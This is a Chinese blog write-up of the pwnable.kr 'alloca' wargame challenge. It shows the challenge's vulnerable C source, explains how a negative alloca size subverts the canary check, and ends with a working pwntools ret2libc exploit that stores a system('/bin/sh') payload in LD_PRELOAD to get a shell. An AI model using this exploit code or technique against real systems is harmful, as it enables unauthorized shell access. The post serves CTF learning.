zoukankan      html  css  js  c++  java
  • [pwnable.kr]--alloca

    0x00:

    好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。

    0x01:

    这个程序是给了源码的

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    void clear_newlines(){
        int c;
        do{
            c = getchar();
        }while (c != '
    ' && c != EOF);
    }
    
    int g_canary;
    int check_canary(int canary){
        int result = canary ^ g_canary;
        int canary_after = canary;
        int canary_before = g_canary;
        printf("canary before using buffer : %d
    ", canary_before);
        printf("canary after using buffer : %d
    
    ", canary_after);
        if(result != 0){
            printf("what the f...??? how did you fucked this buffer????
    ");
        }
        else{
            printf("I told you so. its trivially easy to prevent BOF :)
    ");
            printf("therefore as you can see, it is easy to make secure software
    ");
        }
        return result;
    }
    
    int size;
    char* buffer;
    int main(){
    
        printf("- BOF(buffer overflow) is very easy to prevent. here is how to.
    
    ");
        sleep(2);
        printf("   1. allocate the buffer size only as you need it
    ");
        printf("   2. know your buffer size and limit the input length
    
    ");
    
        printf("- simple right?. let me show you.
    
    ");
        sleep(2);
    
        printf("- whats the maximum length of your buffer?(byte) : ");
        scanf("%d", &size);
        clear_newlines();
    
            printf("- give me your random canary number to prove there is no BOF : ");
            scanf("%d", &g_canary);
            clear_newlines();
    
        printf("- ok lets allocate a buffer of length %d
    
    ", size);
        sleep(1);
    
        buffer = alloca( size + 4 );    // 4 is for canary
    
        printf("- now, lets put canary at the end of the buffer and get your data
    ");
        printf("- don't worry! fgets() securely limits your input after %d bytes :)
    ", size);
        printf("- if canary is not changed, we can prove there is no BOF :)
    ");
        printf("$ ");
    
        memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.
        fgets(buffer, size, stdin);        // there is no way you can exploit this.
    
        printf("
    ");
        printf("- now lets check canary to see if there was overflow
    
    ");
    
        check_canary( *((int*)(buffer+size)) );
        return 0;
    }
    
    

    主要还是需要突破他的防护,拿到shell。
    看下bin文件开了什么保护:

    调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。

    然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。

    0x02:

    后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。
    不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。

    附上我本地调试的时候的exp,环境不同,所以地址可能不同。

    from pwn import *
    import os
    
    off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system
    off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6
    adr_libc    = 0x40047000    # ldd alloca
    adr_payload = 0x40025857    # searchmem "AAAA"
    
    payload     =   p32(adr_libc + off_system)
    payload     +=  p32(0xdeadbeef)
    payload     +=  p32(adr_libc + off_shell)
    
    #test = "AAAABBBBCCCC"
    #p = process('./alloca', env = {'LD_PRELOAD': test})
    p = process('./alloca', env = {'LD_PRELOAD': payload})
    #raw_input("$$")
    p.sendline(str(-92))                   
    p.sendline(str((adr_payload + 4) ^ 0x08048250))
    p.interactive()
    
    '''
    0x40025857 ^ 0x08048250 --> 0x4806da07
    Cannot access memory at address 0x4806da03
    0x40025857 + 4
    '''
    
    

    0x03:参考链接

    http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more

  • 相关阅读:
    Oracle设置某张表为只读
    greenplum不能下载问题解决方法(转)
    MyBatis学习-入门
    Oracle-数据泵使用
    oracle锁表
    linux查看文件大小
    Apache日志分割
    nginx日志切割
    zookeeper 事务日志查看
    zookeeper连接 org.apache.curator.framework.imps.CuratorFrameworkImpl Background exception was not retry-able or retry gave up [main-EventThread]
  • 原文地址:https://www.cnblogs.com/0xmuhe/p/5770806.html
Copyright © 2011-2022 走看看